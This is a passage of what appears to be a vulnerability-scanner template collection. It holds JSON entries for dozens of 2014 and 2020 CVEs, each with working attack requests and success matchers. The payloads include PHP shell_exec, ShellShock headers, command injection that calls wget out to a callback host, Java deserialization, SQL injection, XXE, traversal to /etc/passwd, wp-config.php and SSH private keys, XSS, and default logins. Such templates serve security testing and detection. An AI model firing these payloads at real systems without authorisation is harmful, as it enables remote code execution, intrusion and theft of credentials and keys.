application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=phpcredits"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"word","part":"header","words":["Nette Framework"]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-5902","info":{"name":"F5 BIG-IP TMUI - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release","{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license","{{BaseURL}}/hsqldb%0a"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","BIG-IP release ([\\d.]+)","[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}","HSQL Database Engine Servlet"],"condition":"or"},{"type":"status","status":[200]}]},{"raw":["POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=create%20cli%20alias%20private%20list%20command%20bash\n","POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\nHost: {{Hostname}}\n\nfileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=list%20%2Ftmp%2Fnonexistent\n","POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\nHost: {{Hostname}}\n\ncommand=delete%20cli%20alias%20private%20list\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["h3ll0_w0Rld"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/15zine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/15zine/assets/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-10549","info":{"name":"rConfig <=3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17453","info":{"name":"WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27document.domain%27)%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert('document.domain')//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10189","info":{"name":"ManageEngine Desktop Central Java Deserialization","severity":"critical"},"requests":[{"raw":["POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{generate_java_gadget(\"commons-collections3.1\",\"wget http://{{interactsh-url}}\",\"raw\")}}\n"],"matchers":[{"type":"status","status":[200],"internal":true}]},{"raw":["GET /cewolf/?img=%5Clogger.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9180","info":{"name":"Eleanor CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/go.php?http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5181","info":{"name":"Last.fm Rotation 1.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/lastfm-rotation/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["","/cgi-bin/status","/cgi-bin/stats","/cgi-bin/test","/cgi-bin/status/status.cgi","/test.cgi","/debug.cgi","/cgi-bin/test-cgi","/cgi-bin/test.cgi"]},"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ActiveHelper LiveHelp Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/dompdf.php?input_file=php://filter/resource=/etc/passwd","/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4941","info":{"name":"Cross RSS 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/cross-rss/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate Weather","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-5187","info":{"name":"Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/tom-m8te/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4577","info":{"name":"WP AmASIN \u2013 The Amazon Affiliate Shop - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/shortcode-ninja/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site 